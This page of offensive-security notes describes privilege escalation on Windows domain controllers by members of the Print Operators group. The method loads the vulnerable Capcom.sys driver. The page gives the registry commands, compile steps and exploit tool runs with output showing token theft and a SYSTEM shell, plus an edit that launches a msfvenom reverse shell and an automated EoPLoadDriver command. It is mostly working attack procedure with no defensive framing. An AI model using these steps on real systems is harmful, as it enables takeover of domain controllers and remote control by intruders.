Print Operators

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege. It give rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

If we issue the command whoami /priv, and don't see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC:

By running a command shell as Administrator and entering the credentials of the user that is in the Print Operators Group
If we don't have a GUI, the UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line.

Attack 1: Manual with GUI

The driver Capcom.sys contains functionality to allow any user to execute shellcode with SYSTEM privileges.

We can use our privileges to load this vulnerable driver and escalate privileges. We leverage this POC to enable the privilege as well as loading the driver for us.

First we must modify the POC to add the following includes:

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

We transfer it to the target and compile it:

cl /DUNICODE /D_UNICODE exploit.cpp

Next, we download the Capcom.sys driver from here, and we save it to C:\temp.

Then we add a reference to this driver under our HKEY_CURRENT_USER tree:

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

The odd syntax \??\ used to reference our malicious driver's ImagePath is an NT Object Path. The Win32 API will parse and resolve this path to properly locate and load our malicious driver.

Using Nirsoft's DriverView.exe, we can verify that the Capcom.sys driver is not loaded:

PS C:\hacker> .\DriverView.exe /stext drivers.txt
PS C:\hacker> cat drivers.txt | Select-String -pattern Capcom

Then we run the exploit binary:

exploit.exe

Now we can see that the driver is loaded:

PS C:\hacker> .\DriverView.exe /stext drivers.txt
PS C:\hacker> cat drivers.txt | Select-String -pattern Capcom

Driver Name           : Capcom.sys
Filename              : C:\Tools\Capcom.sys

To exploit the Capcom.sys, we can use the ExploitCapcom tool after compiling with it Visual Studio. We run it and it spawns a system shell:

PS C:\hacker> .\ExploitCapcom.exe

[*] Capcom.sys exploit
[*] Capcom.sys handle was obained as 0000000000000070
[*] Shellcode was placed at 0000024822A50008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched

Attack 2: Manual without GUI

We have to modify the ExploitCapcom.cpp code before compiling:

We edit line 292 and replace C:\\Windows\\system32\\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example: c:\ProgramData\revshell.exe.

TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe"); # From
 TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

Everything else is like Attack 1.

Attack 3: Automated

We can use a tool such as EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver. Before make sure to have uploaded the driver Capcom.sys

Then run:

 EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sysexit

PreviousHyper-V Administrators NextServer Operators

Last updated 2 years ago